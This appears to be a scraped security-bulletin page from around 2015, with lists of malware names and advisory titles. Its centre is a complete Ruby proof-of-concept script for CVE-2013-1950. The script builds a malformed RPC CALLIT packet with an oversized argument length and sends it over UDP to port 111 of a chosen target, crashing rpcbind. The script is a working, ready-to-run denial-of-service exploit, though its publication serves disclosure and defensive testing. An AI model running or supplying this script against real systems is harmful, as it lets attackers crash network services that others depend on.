Security Bulletins
Latest Malware Updates
Downloader.Busadom!g102/27/2015Infostealer.Posteal02/26/2015Downloader.Busadom02/26/2015Trojan.Ladocosm02/26/2015SONAR.SuspDocRun02/25/2015SONAR.SuspHelpRun02/25/2015W32.Tempedreve.D!inf02/25/2015SONAR.PUA!AlnadInsta02/25/2015SONAR.Infostealer!g502/25/2015SONAR.Infostealer!g402/25/2015 |
07/16/2013
rpcbind (CALLIT Procedure) UDP Crash PoC#!/usr/bin/ruby# # rpcbind_udp_crash_poc.rb # 07/15/2013 # Sean Verity <veritysr1980 [at] gmail.com> # CVE 2013-1950 # # rpcbind (CALLIT Procedure) UDP Crash PoC # Affected Software Package: rpcbind-0.2.0-19 # # Tested on: # Fedora 17 (3.9.8-100.fc17.x86_64 #1 SMP) # CentOS 6.3 Final (2.6.32-279.22.1.el6.x86_64 #1 SMP) # # rpcbind can be crashed by setting the argument length # value > 8944 in an RPC CALLIT procedure request over UDP. # require 'socket' def usage abort "\nusage: ./rpcbind_udp_crash_poc.rb <target>\n\n" end if ARGV.length == 1 pkt = [rand(2**32)].pack('N') # XID pkt << [0].pack('N') # Message Type: CALL (0) pkt << [2].pack('N') # RPC Version: 2 pkt << [100000].pack('N') # Program: Portmap (100000) pkt << [2].pack('N') # Program Version: 2 pkt << [5].pack('N') # Procedure: CALLIT (5) pkt << [0].pack('N') # Credentials Flavor: AUTH_NULL (0) pkt << [0].pack('N') # Length: 0 pkt << [0].pack('N') # Credentials Verifier: AUTH_NULL (0) pkt << [0].pack('N') # Length: 0 pkt << [0].pack('N') # Program: Unknown (0) pkt << [1].pack('N') # Version: 1 pkt << [1].pack('N') # Procedure: 1 pkt << [8945].pack('N') # Argument Length pkt << "crash" # Arguments s = UDPSocket.new s.send(pkt, 0, ARGV[0], 111) else usage end |
Security Advisories Database
Remote Code Execution Vulnerability in Microsoft OpenType Font DriverA remote attacker can execute arbitrary code on the target system. 07/21/2015Multiple Vulnerabilities in Linux kernel03/04/2015SQL Injection Vulnerability in PiwigoSQL inection vulnerability has been discovered in Piwigo. 02/05/2015Cross-site Scripting Vulnerability in DotNetNukeA cross-site scripting (XSS) vulnerability has been discovered in DotNetNuke. 02/05/2015Cross-site Scripting Vulnerability in Hitachi Command SuiteA cross-site scripting vulnerability was found in Hitachi Command Suite. 02/02/2015Denial of service vulnerability in FreeBSD SCTP RE_CONFIG Chunk HandlingAn attacker can perform a denial of service attack. 01/30/2015Denial of service vulnerability in Apache Traffic Server HTTP TRACE Max-ForwardsAn attacker can perform a denial of service attack. 01/30/2015Denial of service vulnerability in MalwareBytes Anti-Exploit "mbae.sys"An attacker can perform a denial of service attack. 01/30/2015Denial of service vulnerability in Linux Kernel spliceAn attacker can perform a denial of service attack. 01/29/2015Denial of service vulnerability in Python Pillow Module PNG Text Chunks DecompressionAn attacker can perform a denial of service attack. 01/20/2015 |